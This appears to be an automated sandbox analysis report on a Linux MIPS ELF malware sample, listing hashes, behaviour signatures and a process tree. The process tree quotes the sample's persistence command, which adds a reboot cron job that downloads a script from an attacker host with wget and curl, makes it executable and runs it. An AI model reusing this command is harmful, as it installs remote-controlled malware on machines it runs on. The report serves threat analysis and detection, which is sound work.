Analysis

  • max time kernel
    142s
  • max time network
    139s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
  • submitted
    27-10-2024 02:49

General

  • Target

    b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf

  • Size

    99KB

  • MD5

    2ebce2c623cee35100ce645095e0e17a

  • SHA1

    f8cf8d0db764834f60325110897e8a7cabc96fc4

  • SHA256

    b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840

  • SHA512

    1c3591b36a1ba39c07054af82aff3311f56c051399d027e800618831f40b2e0b3f121118dbe4a81eb2ec3f4203b127887e05c7164c3af8afd08b10a12d27d00e

  • SSDEEP

    1536:IHC8aIWiD9AW0FLQ4LBOe+h2s9ieZWUHy6Yb7SWTnvgkwBu:IHC8HWMxhlUeSl7wBu

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
    /tmp/b9bdd75b55852b3f8d842a482443a7b35732523cd3c8eae4b4b17ca910822840.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:709
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:711
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:713
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:714

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /var/spool/cron/crontabs/tmp.DDLmqg

    Filesize

    306B

    MD5

    8c9ff02103c706a091467f66f463d116

    SHA1

    8389f2e1cb1e2bb7034773f88119c45482870a46

    SHA256

    e001ff127ebf9d6ceed98f1c5b5326b833864a8473b0e072b64de7315ed8c6f4

    SHA512

    da6e9fa9b71115b07d4e4a561800b89732fc20031c955ad9aa11befda0c2567547aa324fb47ad3db536a9dfb93173352d3c3613124b13ae866ac44d77cf8e555